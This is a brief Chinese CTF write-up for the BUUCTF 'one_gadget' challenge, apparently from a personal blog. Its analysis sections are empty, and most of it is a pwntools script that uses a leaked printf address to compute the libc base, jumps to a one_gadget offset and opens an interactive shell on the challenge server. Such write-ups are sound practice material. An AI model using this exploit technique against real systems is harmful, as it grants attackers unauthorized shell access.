BUUCTF-one_gadget(9/100)
一、查保护
二、代码审计
三、过程
给他一个gadget
四、脚本
from pwn import *
#context(os='linux', arch='amd64', log_level='debug')
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
sla=lambda x,y:io.sendlineafter(x,y)
sl=lambda x:io.sendline(x)
rv=lambda x:io.recv(x)
#io = process('./')
io=remote('node3.buuoj.cn',29685)
elf=ELF('./libc-2.29.so')
ru('0x')
printf=int(rv(12),16)
print(printf)
base=printf-elf.sym['printf']
shell=base+0x106ef8
print(shell)
sla('t:',str(shell))
io.interactive()
浙公网安备 33010602011771号